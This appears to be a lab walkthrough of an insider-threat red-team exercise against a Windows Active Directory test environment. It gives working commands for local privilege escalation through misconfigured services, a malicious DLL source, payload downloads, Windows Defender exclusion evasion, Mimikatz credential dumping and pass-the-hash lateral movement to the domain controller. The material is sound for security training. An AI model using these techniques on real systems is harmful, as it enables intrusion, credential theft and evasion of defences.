Case Link to heading
Megacorp, a very large company, has recently acquired several SMEs (Small and Medium-sized Enterprises). Being highly risk-averse and serious about their security posture, Megacorp is conducting multiple simultaneous security assessments.
Task Overview Link to heading
Your assignment is to assess the insider threat scenario through a red-team exercise. Your objectives are:
- Discover and exploit all identifiable security issues.
- Escalate privileges from a low-privileged domain user to demonstrating control over the Active Directory environment.
- Uncover as many exploitation paths as possible.
Note: There are no extra points for finishing quickly; the client expects a thorough examination of the environment.
Rules of Engagement Link to heading
You may use any tools or techniques available, provided you adhere to the following rules:
- Domain Controller Restrictions:
- Do not shutdown, reboot, crash, or otherwise disrupt the domain controller.
- Admin Workstation Restrictions:
- Do not log on locally to Tom’s admin workstation; however, you may connect over the network.
- Do not shutdown, reboot, or crash the admin workstation.
- Do not terminate the admin’s active session.
We do not expect perfect stealth, but actions violating these rules generate excessive noise.
Lab Environment Setup Link to heading
Follow these steps to start the VirtualBox lab environment:
-
Start the Domain Controller VM (
win2019srv
):- Launch from the saved snapshot. If the current state differs from the snapshot, revert to the snapshot first.
- The domain controller VM will start in a minimized window.
-
Start the Admin VM (
win10adm
):- Launch from the saved snapshot. Again, if the current state differs from the snapshot, revert to the snapshot first.
- The VM should start up and display a user logged in with the screen locked.
-
Start Your Workstation (
win10client
):-
Log in using the following credentials:
Username: normaluser Display Name: Norman Luserov Password: L3tm3!n
-
Lab Session Guidelines Link to heading
Each lab session will involve extensive research and experimentation. You are encouraged to test any tools or methods you discover. However, exercise caution when using pre-built tools from online sources, as some may cause system instability. If you damage your VM, revert to the snapshot and start over.
Further instructions will be provided at the beginning of each session. A team sync-up will occur at the end of each session to share ideas, successes, and failures.
Reconnaissance Link to heading
Initial Enumeration of the Environment Link to heading
command:
whoami
result:
adlab\normaluser
We have established the current user context as adlab\normaluser. This is a domain user account that will serve as our starting point for further enumeration and privilege escalation.
command:
hostname
result:
win10client
The system’s hostname is confirmed to be win10client
, which matches the earlier information from systeminfo
.
command:
systeminfo
The system information reveals critical details about the host:
- Hostname: WIN10CLIENT
- OS: Windows 10 Pro (Version 19045)
- Domain: ADLAB.local
- Network Adapters:
- IP Address:
192.168.56.40
- IP Address:
From this output, we gather that the system is part of the ADLAB.local
domain, and the primary active network interface is operating in the 192.168.56.0/24
range. This will be the primary focus for network exploration and potential lateral movement.
echo %logonserver%
The domain controller is \\WIN2019DC
, a critical target for future exploitation steps.
User Enumeration Link to heading
We use the net user
command to enumerate domain users.
net user /domain
A long list of users is returned. Some notable accounts to consider during further exploration include:
- Administrator
- Normaluser (our current user)
- sqlserver
- chantalle.karol (listed as a Domain Admin)
- domad (another Domain Admin)
This enumeration will be helpful in identifying potential lateral movement or privilege escalation targets.
Group Enumeration Link to heading
Next, we enumerate domain groups to understand group memberships and potential privileges.
net group /domain
We observe some key groups, such as:
- Domain Admins
- Enterprise Admins
- IT Admins
- Executives
- Office Admin
Privilege Information Link to heading
We also confirm that chantalle.karol
and domad
are part of the Domain Admins
group, making them prime targets for credential theft or impersonation.
net group "domain admins" /domain
The Domain Admins group members are:
- Administrator
- chantalle.karol
- domad
- sqlserver
This confirms our earlier findings and highlights potential high-value targets for privilege escalation.
Identifying Non-Default Applications Link to heading
To identify third-party or non-default applications that could potentially be exploited, we inspected the installed applications via the Settings > Apps > Apps & features menu.
During this process, we discovered the presence of Angry IP Scanner, a network scanning tool, which could be useful for gaining further insight into the network’s structure and identifying potential targets for lateral movement.
Screenshot of the installed application list revealed:
- Angry IP Scanner (Version 3.9.1), which could be leveraged for reconnaissance.
Network Reconnaissance “Using Angry IP Scanner” Link to heading
Since Angry IP Scanner
is already installed on the workstation, we leverage it to scan the local network.
The scan results for the 192.168.56.0/24
subnet reveal several hosts, including:
- WIN2019DC (192.168.56.10): The domain controller
- win10adm (192.168.56.30): The admin workstation
- win10client.ADLAB.local (192.168.56.40): Our current workstation
These hosts represent the core environment we need to explore. The domain controller and the admin workstation are key systems to focus on for privilege escalation.
Identifying Potential Third-Party Services Link to heading
Through the UI Link to heading
We explored services to identify potential vulnerable or third-party services.
-
Open the Services Manager:
- Press ⊞ Win + R to open the Run dialog.
- Type
Services.msc
and hit Enter.
-
Sort Services by Description:
- Once in the Services Manager, sort the services by their description to locate services that lack a description or that seem non-standard. These are likely third-party services or custom configurations.
By following these steps, we identified several non-default services that lack descriptions, which could be potentially exploitable:
- Unquoted Path Service
- RemoteMouseService
- Insecure Registry Service
- File Permission Service
- DLL Hijack Service
- DACL Service
Note: Third-party services may or may not have a description. Just because a service has a description doesn’t mean it’s safe, and conversely, the absence of a description could indicate a non-standard service that might be exploitable. Tip: Pay attention to services running under a named user account.
Through CMD Link to heading
Services running from outside the Windows System32 directory are more likely to be third-party or non-standard. Use the following command to identify them:
wmic service get name,displayname,pathname | findstr /i /v "C:\\Windows\\System32\\"
Scheduled Tasks in “Tasks Migrated” Folder Link to heading
Check for misconfigured scheduled tasks that can escalate privileges.
-
Go to the Folder:
-
Open the Tasks Migrated folder by running:
cd C:\Windows\Tasks Migrated
-
-
List the Files:
-
See what’s inside by typing:
dir
-
You’ll see files representing scheduled tasks, for example:
pinger MicrosoftEdgeUpdateTaskMachineCore OneDrive Reporting Task...
-
-
View Task Details:
-
Use the
type
command to look inside a task. For example:type pinger
This shows information about who runs the task and what it does. Key things to look for:
- Author: The user who created the task (e.g.,
Administrator
). - Triggers: When the task runs (e.g., at logon).
- Actions: The command it runs (e.g.,
pinger.bat
script).
-
Note: Knowing who created the task is important because it tells you what level of privileges the task has when it runs.
Resource Development Link to heading
Get Sysinternals Suite Link to heading
Sysinternals provides a suite of tools useful for lateral movement and system investigation.
-
Download Sysinternals ZIP File
In cmd, use
curl
to download the Sysinternals Suite to yourHome
folder:curl -o %USERPROFILE%\SysinternalsSuite.zip https://download.sysinternals.com/files/SysinternalsSuite.zip
In PowerShell, use
Invoke-WebRequest
to download the suite:Invoke-WebRequest -Uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -OutFile "$HOME\SysinternalsSuite.zip"
Both commands will download the Sysinternals Suite and save it as
SysinternalsSuite.zip
in theHome
folder. -
Create Destination Folder
If the folder for Sysinternals does not exist, create it before extracting:
In cmd, use
mkdir
:mkdir %USERPROFILE%\SysinternalsSuite
In PowerShell, use
New-Item
:New-Item -Path "$HOME\SysinternalsSuite" -ItemType Directory
-
Extract Sysinternals ZIP File
In cmd, use
tar
to extract the SysinternalsSuite.zip file:tar -xf %USERPROFILE%\SysinternalsSuite.zip -C %USERPROFILE%\SysinternalsSuite
In PowerShell, use
Expand-Archive
to extract the contents:Expand-Archive -Path "$HOME\SysinternalsSuite.zip" -DestinationPath "$HOME\SysinternalsSuite"
This extracts the Sysinternals Suite into the
$HOME\SysinternalsSuite
folder for further use.
Tip: Check the complete path of your users
Home
usingecho %USERPROFILE%
in cmd orecho $HOME
in powershell.
Privilege Escalation Link to heading
Several services running as Local System are vulnerable:
- RemoteMouseService (CVE-2021-35448)
- Unquoted Path Service
- Insecure Registry Service
- File Permission Service
- DLL Hijack Service
- DACL Service
One misconfigured task, created by Administrator, which can be modified:
- Scheduled Tasks (pinger)
Our goal is to exploit these to gain local administrative privileges.
RemoteMouseService (CVE-2021-35448) Link to heading
The Remote Mouse application lets us open an administrator command prompt.
Steps:
-
Open Settings:
- Click the Remote Mouse icon in the system tray.
- Select Settings.
-
Change Image Transfer Folder:
- Click Change… next to Image Transfer Folder.
- A Save As dialog appears.
-
Launch Command Prompt:
-
In the address bar, type:
C:\Windows\System32\cmd.exe
-
Press Enter.
-
An administrator command prompt opens.
-
-
Verify Privileges:
whoami nt authority\system
-
Create Admin User:
To create a new administrator account, use the following command:
net user <username> <password> /add && net localgroup administrators <username> /add
Example:
net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add
- username: The desired name for the new account (e.g.,
helpdesk
). - password: The password for the new account (e.g.,
L3tm3!n
).
Result:
This command creates a new user with the specified credentials and adds it to the Administrators group, granting elevated privileges.
- username: The desired name for the new account (e.g.,
Unquoted Service Path Link to heading
This service has an unquoted executable path with spaces, making it vulnerable to privilege escalation. The path is:
Enumerating Unquoted Service Paths Using Manual Techniques:
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
We focus on:
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Steps:
-
Check Folder Permissions:
-
Run this command to check who can access and modify files in the folder:
icacls "C:\Program Files\Unquoted Path Service"
-
Look for the following permission flags in the output:
- (F) – Full control: Can read, write, delete, and change permissions.
- (M) – Modify: Can read, write, and delete files.
- (RX) – Read & Execute: Can read and run files.
- (R) – Read: Can only view the files.
- (W) – Write: Can add files but with limited rights.
-
Focus on whether BUILTIN\Users, Everyone or other non-admin groups have (F) or (M) permissions, meaning you can write or modify files. If only (RX) or (R) is shown, you don’t have the required access.
-
-
Create a Batch File:
-
Write a simple batch file called
Common.bat
with the following content:net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add
-
This will create a user
helpdesk
with administrative rights.
-
-
Convert Batch File to Executable:
- Use a tool like bat2exe to convert the batch file into an executable file (
Common.exe
).
- Use a tool like bat2exe to convert the batch file into an executable file (
-
Optional: Download the Executable Payload:
-
If you already have the executable payload hosted somewhere, you can download it using the following
curl
command:curl -o "C:\Program Files\Unquoted Path Service\Common.exe" https://raw.githubusercontent.com/Ardemium/InsideJob/refs/heads/main/payloads/Common.exe
Note: Modify the destination path (
"C:\Program Files\Unquoted Path Service\Common Files\Common.exe"
) to your desired location and file name, if necessary.
-
-
Place Executable:
-
Save the newly created
Common.exe
into:C:\Program Files\Unquoted Path Service\Common Files\
-
-
Restart the Service:
-
Restart the vulnerable service to trigger the execution of your malicious file:
sc stop unquotedsvc sc start unquotedsvc
-
Insecure Registry Service Link to heading
We can change the service’s executable path in the registry.
Tip: Try running the
ModifyServiceImagePath.bat
util!
(Optional) Running ModifyServiceImagePath util Link to heading
-
Download the Batch File:
Use this command to download a batch file to your computer:
curl -L -o "%USERPROFILE%\ModifyServiceImagePath.bat" https://raw.githubusercontent.com/Ardemium/InsideJob/refs/heads/main/utils/ModifyServiceImagePath.bat
-
Run the Batch File:
Run the downloaded batch file to create a new user (
helpdesk
), set the password toL3tm3!n
, and give the user admin rights:%USERPROFILE%\ModifyServiceImagePath.bat "cmd.exe /c net user helpdesk L3tm3!n /add ^&^& net localgroup administrators helpdesk /add"
-
Start a Service:
Finally, start the
regsvc
service (Remote Registry service) with this command:sc start regsvc
GUI Steps:
-
Open Registry Editor:
- Press ⊞ Win + R, type
regedit
, and press Enter.
- Press ⊞ Win + R, type
-
Navigate to Service Key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
-
Edit
ImagePath
:-
Right-click
ImagePath
and select Modify. -
Change the value to:
cmd.exe /c net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add
-
-
Restart Service:
sc stop regsvc sc start regsvc
CMD Steps:
-
Modify the Registry Using a One-Liner Command:
-
Run the following command to change the
ImagePath
in the registry:reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc" /t REG_EXPAND_SZ /v ImagePath /d "cmd.exe /c net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add" /f
-
-
Restart the
regsvc
Service:-
Run the following commands to restart the service:
sc stop regsvc sc start regsvc
-
File Permission Service Link to heading
We have write access to the service executable.
"C:\Program Files\File Permissions Service\filepermservice.exe"
Steps:
-
Find Service Path:
sc qc filepermsvc
BINARY_PATH_NAME:
"C:\Program Files\File Permissions Service\filepermservice.exe"
-
Check Folder Permissions:
-
Run this command to check who can access and modify the file:
icacls "C:\Program Files\File Permissions Service\filepermservice.exe"
-
Look for the following permission flags in the output:
- (F) – Full control: Can read, write, delete, and change permissions.
- (M) – Modify: Can read, write, and delete files.
- (RX) – Read & Execute: Can read and run files.
- (R) – Read: Can only view the files.
- (W) – Write: Can add files but with limited rights.
-
Focus on whether BUILTIN\Users, Everyone or other non-admin groups have (F) or (M) permissions, meaning you can write or modify files. If only (RX) or (R) is shown, you don’t have the required access.
-
-
Create a Batch File:
-
Write a simple batch file called
filepermservice.bat
with the following content:net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add
-
This will create a user
helpdesk
with administrative rights.
-
-
Convert Batch File to Executable:
- Use a tool like bat2exe to convert the batch file into an executable file (
filepermservice.exe
).
- Use a tool like bat2exe to convert the batch file into an executable file (
-
Optional: Download the Executable Payload:
-
If you already have the executable payload hosted somewhere, you can download it using the following
curl
command:curl -o "C:\Program Files\File Permissions Service\filepermservice.exe" https://raw.githubusercontent.com/Ardemium/InsideJob/refs/heads/main/payloads/filepermservice.exe
Note: Modify the destination path (
"C:\Program Files\File Permissions Service\filepermservice.exe"
) to your desired location and file name, if necessary.
-
-
Replace Executable:
copy /Y Z:\filepermservice.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
-
Restart Service:
sc stop filepermsvc sc start filepermsvc
DLL Hijack Service Link to heading
A vulnerable service attempts to load a missing DLL, which allows us to escalate privileges by injecting a malicious DLL.
Steps:
-
Identify Missing DLLs:
-
Use a tool like ProcMon to detect which DLLs the service tries to load but cannot find.
-
Optional Setup: If you lack administrative privileges to run ProcMon, you can extract
dllhijackservice.exe
and create a service on a machine where you have admin access to investigate its behavior:sc create dllsvc binpath="C:\fullpath\to\dllhijackservice.exe"
-
In ProcMon, configure a filter to focus on the target process:
- Column: Process Name
- Relation: is
- Value: dllhijackservice.exe
- Action: include
-
Upon running the service, ProcMon will show an attempt to load a missing DLL, such as
hijackme.dll
. The service will first search for the DLL in its own directory, for example:C:\Program Files\DLL Hijack Service\hijackme.dll
If the DLL is not found, it will search through directories listed in the system’s PATH environment variable.
-
-
Create Malicious DLL:
-
Write a malicious DLL that creates a new user with administrative privileges. Create a file called
hijackme.c
with the following content:#include <windows.h> BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { system("cmd.exe /c net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add"); ExitProcess(0); } return TRUE; }
-
Compile the DLL using a cross-compiler:
-
For 64-bit systems:
x86_64-w64-mingw32-gcc hijackme.c -shared -o hijackme.dll
-
For 32-bit systems:
i686-w64-mingw32-gcc hijackme.c -shared -o hijackme.dll
-
-
-
Optional: Download the DLL Payload:
-
If you already have the DLL payload hosted somewhere, you can download it using the following
curl
command:curl -o "C:\temp\hijackme.dll" https://raw.githubusercontent.com/Ardemium/InsideJob/refs/heads/main/payloads/hijackme.dll
Note: Modify the destination path (
"C:\temp\hijackme.dll"
) to your desired location and file name, if necessary.
-
-
Deploy the Malicious DLL:
-
Copy the compiled
hijackme.dll
to the vulnerable service’s directory:copy Z:\hijackme.dll "C:\temp"
-
-
Restart the Service:
-
Restart the service to trigger the malicious DLL:
sc stop dllsvc sc start dllsvc
-
DACL Service Link to heading
The daclsvc
service has improper permissions that allow unauthorized users to modify its configuration due to the DC permission (Change Configuration
) being granted to the Everyone group.
Prerequisites:
accesschk.exe
utility from Sysinternals suite.
Steps:
-
Check Permissions:
-
Run the following command to view the service’s security descriptor:
%USERPROFILE%\SysinternalsSuite\accesschk.exe -uwvc "normaluser" *
-
Look for this specific part of the output:
Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com RW daclsvc SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_CHANGE_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS SERVICE_START SERVICE_STOP READ_CONTROL
-
Interpreting the results:
TheSERVICE_CHANGE_CONFIG
permission means that any user, including the “normaluser” in this case, has the right to modify the service’s configuration, including its binary path. This exposes the service to exploitation, allowing an attacker to run arbitrary commands with the service’s privileges.
-
-
Modify Service Path:
-
Use the following command to change the binary path of the service to execute a command that creates a new user and adds them to the administrators group:
sc config daclsvc binPath= "cmd.exe /c net user helpdesk L3tm3!n /add && net localgroup administrators helpdesk /add"
-
-
Restart Service:
-
Stop and start the service to execute the command:
sc stop daclsvc sc start daclsvc
-
Scheduled Tasks (pinger) Link to heading
We have identified a scheduled task running under an administrative account, and we have permission (Indirect) to modify the script it runs.
Steps:
-
Check File and Folder Permissions:
-
Ensure you can edit the script or file that the task runs by checking the permissions with the following command:
icacls C:\temp\pinger.bat
Output example:
pinger.bat NT AUTHORITY\SYSTEM:(F) BUILTIN\Administrators:(F) BUILTIN\Users:(RX)
- In this case, BUILTIN\Users only has (RX) (Read & Execute) access to the file, meaning regular users can only read and run it but cannot modify it.
-
Next, check the permissions on the folder:
icacls C:\temp
Output example:
. BUILTIN\Users:(OI)(CI)(F) NT AUTHORITY\Authenticated Users:(I)(M)
- Here, BUILTIN\Users have (F) (Full Control) on the folder, meaning you can add, delete, or modify files in this directory, even though the specific file
pinger.bat
cannot be modified directly.
- Here, BUILTIN\Users have (F) (Full Control) on the folder, meaning you can add, delete, or modify files in this directory, even though the specific file
-
-
Bypass File Restrictions:
-
Since you cannot directly modify
pinger.bat
, you can delete theC:\temp
folder entirely and recreate it with your own script. First, delete theC:\temp
folder:del C:\temp
Confirm the deletion when prompted.
-
Recreate the folder and add your own version of the
pinger.bat
file:mkdir C:\temp echo net user helpdesk L3tm3!n /add > C:\temp\pinger.bat echo net localgroup administrators helpdesk /add >> C:\temp\pinger.bat
-
-
Run the Scheduled Task:
-
If the task is set to run at logon, simply log off and back on to trigger it. Alternatively, run the task manually with:
schtasks /run /tn "pinger"
-
Verify Local Admin Access Link to heading
Check if the helpdesk
user has been added with administrative privileges:
net user
net user helpdesk
net localgroup administrator
After completing the steps, you should see this result, which shows that the privilege escalation worked:
C:\Users\normaluser>net user
User accounts for \\WIN10CLIENT
Administrator DefaultAccount Guest
helpdesk WDAGUtilityAccount
The command completed successfully.
The helpdesk
user has been created. You can check its details:
C:\Users\normaluser>net user helpdesk
User name helpdesk
Account active Yes
Account expires Never
Local Group Memberships *Administrators *Users
The command completed successfully.
You can also verify that helpdesk
is part of the Administrators group:
C:\Users\normaluser>net localgroup administrators
Alias name administrators
Members
ADLAB\IT Admins
Administrator
helpdesk
The command completed successfully.
This confirms that the attack has added the helpdesk
account to the Administrators group, giving it full control of the system.
Defense Evasion Link to heading
Avoid being detected by security tools like antivirus programs by exclude folders from being scanned by Windows Defender, using either the graphical interface (Windows Security UI) or PowerShell.
Folder Exclusion in Windows Defender UI Link to heading
Follow these steps to exclude a folder from Windows Defender scans using the Windows interface:
-
Open Windows Security:
- Go to the Start menu and search for Windows Security.
- Click on Virus & threat protection.
-
Manage Settings:
- Scroll down and click on Manage settings under Virus & threat protection settings.
-
Add Exclusions:
- Scroll to Exclusions and click Add or remove exclusions.
-
Exclude a Folder:
- Click Add an exclusion, then choose Folder.
- Select the folder you want to exclude and confirm.
Note: When logging into the system with the local administrator account (e.g., “helpdesk”) via the Windows login screen, you must use the “dot backslash” (
.\
) notation to specify a local user account rather than a domain account. For example, to log in as the local “helpdesk” account, enter:
.\helpdesk
. This ensures the login is processed against the local Security Accounts Manager (SAM) database instead of the domain’s Active Directory. Tip: ExcludeC:\Users\helpdesk
this is the same as%USERPROFILE%
in cmd and$HOME
in PowerShell.
Folder Exclusion in Windows Defender PowerShell Link to heading
You can also exclude folders using PowerShell. Here’s how:
-
Open PowerShell as Administrator:
- Right-click the Start menu, choose Windows PowerShell (Admin).
-
Add a Folder Exclusion:
-
Type this command, replacing
"$HOME"
with the folder you want to exclude:Add-MpPreference -ExclusionPath "$HOME"
-
-
Check Exclusions:
-
To see the excluded folders, type:
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
-
-
Remove a Folder Exclusion (Optional):
-
If you need to remove an exclusion, use this command:
Remove-MpPreference -ExclusionPath "$HOME"
-
Note: There is a patch that prevents excluding the root
C:\
drive using PowerShell. However, this can be bypassed by excluding a specific folder withinC:\
, such asC:\Temp
, as the patch only blocks exclusions ending withC:\
, not folders inside it.
Folder Exclusion in Windows Defender PowerShell through CMD Link to heading
You can also exclude folders using PowerShell through CMD. Here’s how:
-
Open Command Prompt as Administrator:
- Press Win + X and choose Command Prompt (Admin).
-
Add a Folder Exclusion:
-
Type this command, replacing
%USERPROFILE%
with the folder you want to exclude:powershell -c "Add-MpPreference -ExclusionPath '%USERPROFILE%'"
-
-
Check Exclusions:
-
To see the excluded folders, type:
powershell -c "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath"
-
-
Remove a Folder Exclusion (Optional):
-
If you need to remove an exclusion, use this command:
powershell -c "Remove-MpPreference -ExclusionPath '%USERPROFILE%'"
-
Note: There is a patch that prevents excluding the root
C:\
drive using PowerShell. However, this can be bypassed by excluding a specific folder withinC:\
, such asC:\Temp
, as the patch only blocks exclusions ending withC:\
, not folders inside it.
Lateral Movement Link to heading
Lateral movement is an important step in an attack, where the attacker moves from one system to another in the network. This usually happens after they get initial access and increase their privileges on a hacked machine. Here, we’ll look at ways to move through the network quietly to reach key targets, like the Domain Controller (DC) or admin computers.
Get Mimikatz Link to heading
download, extract, and prepare mimikatz
-
Download Mimikatz ZIP File
In cmd, use the
curl
command to download the file:curl -L -o "%USERPROFILE%\mimikatz.zip" "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip"
In PowerShell, use
Invoke-WebRequest
:Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -OutFile "$HOME\mimikatz.zip"
Both commands will download the file from the specified URL and save it as
mimikatz.zip
in the current directory. -
Create Destination Folder
If the destination folder does not exist, you can create it before extracting the archive.
In cmd, use
mkdir
:mkdir %USERPROFILE%\mimikatz
In PowerShell, use
New-Item
:New-Item -Path "$HOME\mimikatz" -ItemType Directory
After creating the folder, you can proceed to extract the archive into it.
-
Extract ZIP File
In cmd, use
tar
to extract the ZIP file (this works on Windows 10 and later):tar -xf %USERPROFILE%\mimikatz.zip -C %USERPROFILE%\mimikatz
In PowerShell, use
Expand-Archive
to extract the ZIP file:Expand-Archive -Path "$HOME\mimikatz.zip" -DestinationPath "$HOME\mimikatz"
This command extracts the contents of
mimikatz.zip
into the specified folder. Make sure to replace the path with your desired location.
Using Pass-the-Hash (PTH) Attack Link to heading
We’ll perform a pass-the-hash (PtH) attack using Mimikatz to move laterally from win10client.ADLAB.local
(192.168.56.40) to win10adm
(192.168.56.30). The Administrator account uses the same password on both machines, allowing us to reuse the NTLM hash for authentication.
Prerequisites:
- Administrative privileges on
win10client
. - Mimikatz executable available on
win10client
.
Step 1: Extract the NTLM Hash with Mimikatz
First, we need to dump the NTLM hash of the Administrator account on win10client
.
Command:
-
Open an elevated command prompt (Run as Administrator).
-
Run Mimikatz:
In cmd, use:
%USERPROFILE%\mimikatz\x64\mimikatz.exe
In PowerShell, use
& $HOME\mimikatz\x64\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz #
-
In the Mimikatz console, enable debug privileges:
privilege::debug
-
Dump the credentials from LSASS:
sekurlsa::logonpasswords
Explanation:
privilege::debug
: Grants the necessary privileges to access system processes.sekurlsa::logonpasswords
: Extracts authentication material from the Local Security Authority Subsystem Service (LSASS).
Output Interpretation:
Look for the Administrator account details:
* Username : Administrator
* Domain : WIN10CLIENT
* NTLM : af992895db0f2c42a1bc96546e92804a
Note: the NTLM hash value; we’ll use it in the next step.
Step 2: Perform Pass-the-Hash to Create a New Session Use the extracted NTLM hash to create a new session that impersonates the Administrator account.
Command:
In the Mimikatz console:
sekurlsa::pth /user:Administrator /domain:WIN10CLIENT /ntlm:<NTLM_HASH> /run:cmd.exe
Example:
sekurlsa::pth /user:Administrator /domain:WIN10CLIENT /ntlm:af992895db0f2c42a1bc96546e92804a /run:cmd.exe
Replace <NTLM_HASH>
with the actual hash extracted earlier.
Explanation:
sekurlsa::pth
: Initiates a pass-the-hash attack./user
: The username to impersonate./domain
: The domain or local machine name./ntlm
: The NTLM hash of the user’s password./run
: The process to execute under the impersonated account (e.g.,cmd.exe
).
Result:
A new command prompt opens with the security context of the Administrator account using the supplied NTLM hash.
Step 3: Lateral Movement to win10adm
With the new Administrator session, attempt to access win10adm
remotely.
Verification: Using SMB to List Remote Shares:
dir \\192.168.56.30\C$
Explanation:
- Attempts to list the contents of the
C$
administrative share onwin10adm
.
Using PsExec for a Remote Shell: Prerequisite: Download PsExec from Sysinternals Suite.
Command:
In cmd, use
%USERPROFILE%\SysinternalsSuite\psexec.exe -r processname /accepteula \\192.168.56.30 cmd.exe
In PowerShell, use
& $HOME\SysinternalsSuite\psexec.exe -r processname /accepteula \\192.168.56.30 cmd.exe
Explanation:
psexec.exe
: Executes processes on remote systems.\\192.168.56.30
: Specifies the target machine.-r processname
: Provides a custom process name to bypass restrictions.cmd.exe
: The command to execute on the remote system.
Achieved Result:
- A command prompt running on
win10adm
will open. - You can now execute commands directly on the admin workstation.
We’ve demonstrated how to use Mimikatz for a pass-the-hash attack to achieve lateral movement from win10client
to win10adm
by exploiting a reused Administrator password.
Transferring Tools Link to heading
In this process, we will use Mimikatz to facilitate lateral movement between two systems: win10client
(192.168.56.40) and win10adm
(192.168.56.30). We’ll open two command prompt windows from the Mimikatz session on win10client
. One of these command prompt windows will use PsExec to escalate privileges and become the win10adm
administrator. We will refer to these command prompt windows throughout the documentation as win10client and win10adm, respectively.
-
Exclude the Home Directory from Antivirus Scanning:
- Add the newly created directory to Windows Defender’s exclusion list to avoid detection of the tools.
Command (win10adm Window):
powershell -c "Add-MpPreference -ExclusionPath '%USERPROFILE%'"
Explanation:
Add-MpPreference
: Modifies Windows Defender preferences.-ExclusionPath
: SpecifiesC:\Users\Administrator\
as an exclusion from antivirus scanning, helping to avoid detection of the tools.
-
Map the
C$
Administrative Share ofwin10adm
:- Map the
C$
administrative share ofwin10adm
to a local drive (X:
) onwin10client
to enable file transfers.
Command (win10client Window):
net use x: \\192.168.56.30\C$
Explanation:
net use
: Maps a network share.X:
: Assigns theC$
administrative share onwin10adm
to driveX:
onwin10client
.
- Map the
-
Navigate to the
win10adm
share:- After mapping the
C$
share, change the directory onwin10client
to the share.
Command (win10client Window):
X:
Explanation:
X:
: Switches to the mappedX:
drive, which corresponds to theC$
share onwin10adm
.cd X:\Users\Administrator\
: Navigates to theC:\Users\Administrator\
directory onwin10adm
.
- After mapping the
-
Transfer Tools to
win10adm
:- Copy the Mimikatz executable (or other necessary tools) from
win10client
toC:\temp
onwin10adm
.
Command (win10client Window):
copy %USERPROFILE%\mimikatz\x64\* X:\Users\Administrator\
Explanation:
copy
: Copies files from the specified source directory (%USERPROFILE%\mimikatz\x64\*
) toC:\Users\Administrator\
onwin10adm
via the mapped drive.
- Copy the Mimikatz executable (or other necessary tools) from
-
Execute Mimikatz on
win10adm
:- Once the tools are transferred, execute Mimikatz on
win10adm
to perform actions such as credential dumping or pass-the-hash attacks.
Command (win10adm Window):
%USERPROFILE%\mimikatz.exe
Explanation:
- This command runs Mimikatz from the temporary directory on
win10adm
, allowing you to perform further exploitation, such as dumping credentials or lateral movement.
- Once the tools are transferred, execute Mimikatz on
Note: After performing step 5, execute step 6 as soon as possible. Defender may detect Mimikatz during transfer, but executing it quickly locks the file, making it harder for Defender to remove.
Extract the Domain Admin NTLM Hash Link to heading
Extract the NTLM Hash with Mimikatz
We need to dump the NTLM hash of the Domain Administrator account on win10adm
.
Command:
-
Run Mimikatz:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz #
-
In the Mimikatz console, enable debug privileges:
privilege::debug
-
Dump the credentials from LSASS:
sekurlsa::logonpasswords
Explanation:
privilege::debug
: Grants the necessary privileges to access system processes.sekurlsa::logonpasswords
: Extracts authentication material from the Local Security Authority Subsystem Service (LSASS).
Output Interpretation:
Look for the Administrator account details:
* Username : domad
* Domain : ADLAB
* NTLM : cff48581d56085119bddffacfae51aeb
Note: the NTLM hash value & close the win10adm window
Use Pass-the-Hash to Access the Domain Controller Link to heading
Now that we have the NTLM hash of the Domain Admin account (domad
), we can use the Pass-the-Hash (PTH) attack to gain access to the Domain Controller (DC) and dump all Active Directory (AD) hashes. Follow the steps below:
-
Run Pass-the-Hash with Mimikatz: In the Mimikatz console (still on the compromised workstation), execute the Pass-the-Hash attack by running:
sekurlsa::pth /user:domad /domain:adlab.local /ntlm:cff48581d56085119bddffacfae51aeb /run:cmd.exe
Explanation:
sekurlsa::pth
: Initiates the pass-the-hash attack./user:domad
: Username of the Domain Admin account./domain:adlab.local
: The domain name./ntlm:cff48581d56085119bddffacfae51aeb
: The NTLM hash of the domad account./run:cmd.exe
: This opens a new command prompt under the context of the domad account.
A new command prompt should open as domad. Now, verify your access to the Domain Controller by trying to access its administrative share:
-
List the contents of the Domain Controller’s C$ share:
dir \\192.168.56.10\c$
Explanation:
192.168.56.10
is the IP address of the Domain Controller.C$
is the administrative share.
If you see the directory contents, the Pass-the-Hash was successful, and you have administrative access to the Domain Controller.
Dump All Hashes from Active Directory Link to heading
